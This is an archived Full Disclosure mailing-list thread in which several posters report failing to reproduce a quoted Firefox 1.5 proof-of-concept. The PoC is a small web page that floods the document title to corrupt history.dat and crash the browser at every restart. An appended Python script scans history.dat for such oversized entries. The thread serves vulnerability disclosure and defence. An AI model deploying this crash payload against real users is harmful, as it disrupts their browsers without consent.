Full Disclosure mailing list archives

Re: re: Firefox 1.5 buffer overflow (poc)


From: Matt <paranoidgeek () gmail com>
Date: Fri, 9 Dec 2005 08:51:41 +1300

Didn't work here, just made the system go a bit sluggish for a moment, as
you would expect when dealing with a 2.5 million character string.

Firefox :
Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8) Gecko/20051130 Firefox/1.5
Built with :
gcc version 3.4.4 (Gentoo 3.4.4-r1, ssp-3.4.4-1.0, pie-8.7.8)
Window manager:
KDE 3.5.0

Possibly it is crashing the Windows API?

--
Matt


On 12/9/05, Ron <iago () valhallalegends com> wrote:

I was also unable to replicate it, on Firefox 1.5 i386 Linux EN

ad () heapoverflow com wrote:

nor a fake, nor you really don't know what is a buffer overflow, but for
sure here on my firefox 1.5 EN, the client is much longer to load to
the next boot but it reloads fine without exceptions and there is
nothing about a security bug here...


<!-- Firefox 1.5 buffer overflow

Basically firefox logs all kinds of URL data in its history.dat file,
this little script will set a really large topic and Firefox will then
save that topic into its history.dat.. The next time that firefox is
opened, it will instantly crash due to a buffer overflow -- this will
happen every time until you manually delete the history.dat file --
which most users won't figure out.

this proof of concept will only prevent someone from reopening
their browser after being exploited. DoS if you will. however, code
execution is possible with some modifications.

Tested with Firefox 1.5 on Windows XP SP2.

ZIPLOCK <sickbeatz () gmail com>

-->
<html><head><title>heh</title><script type="text/javascript">
function ex() {
     var buffer = "";
     for (var i = 0; i < 5000; i++) {
             buffer += "A";
     }
     var buffer2 = buffer;
     for (i = 0; i < 500; i++) {
             buffer2 += buffer;
     }
     document.title = buffer2;
}
</script></head><body>ZIPLOCK says <a href="javascript:ex();">CLICK ME
</a></body></html>

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
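The PoC's claimed effect is a history.dat that crashes the browser on every start until the file is deleted. As a defender-side triage check added here (not part of the thread or of Firefox), the script below scans a history.dat image for the oversized stored value the PoC would leave behind: history.dat is in Mork format, whose string atoms look like `(hexid=value)`, and the parser here is a deliberate simplification that ignores Mork's backslash escapes. The sample data is constructed, not taken from a real profile.

```python
import re
import sys

# The PoC builds a title of 5000 * 501 = 2,505,000 characters; a stored value
# anywhere near that size is abnormal, so the threshold sits well below it.
SUSPICIOUS_LENGTH = 100_000

# Mork keeps strings in atoms of the form (hexid=value). Simplification
# (assumption): backslash-escaped parentheses inside values are ignored,
# which is enough to spot one enormous value.
ATOM = re.compile(rb'\(([0-9A-Fa-f]+)=([^()]*)\)')


def scan_atoms(data: bytes):
    """Yield (atom_id, value_length, preview) for every atom in the image."""
    for m in ATOM.finditer(data):
        value = m.group(2)
        yield m.group(1).decode('ascii'), len(value), value[:20]


def assess_history(data: bytes) -> dict:
    """Summarise a history.dat image: size, its largest atom and a verdict."""
    largest = max(scan_atoms(data), key=lambda a: a[1], default=(None, 0, b''))
    return {
        'size': len(data),
        'largest_atom_id': largest[0],
        'largest_value_len': largest[1],
        'preview': largest[2],
        'suspicious': largest[1] >= SUSPICIOUS_LENGTH,
    }


# Constructed samples: a normal entry, and the same file with the
# 2,505,000-byte title the PoC would persist appended as one more atom.
SAMPLE_CLEAN = (b'// <!-- <mdb:mork:z v="1.4"/> -->\n'
                b'<(80=http://example.invalid/)(81=Example page)>\n')
SAMPLE_POISONED = SAMPLE_CLEAN + b'<(82=' + b'A' * 2_505_000 + b')>\n'

if __name__ == '__main__':
    # Usage: python check_history.py /path/to/history.dat
    with open(sys.argv[1], 'rb') as f:
        report = assess_history(f.read())
    print(report)
    if report['suspicious']:
        print('oversized entry found; remove history.dat from the closed profile')
```

Run it against a profile's history.dat; a `largest_value_len` in the millions with a monotonous preview is the signature the thread describes, and the fix is the one the PoC author names: delete the file while the browser is closed.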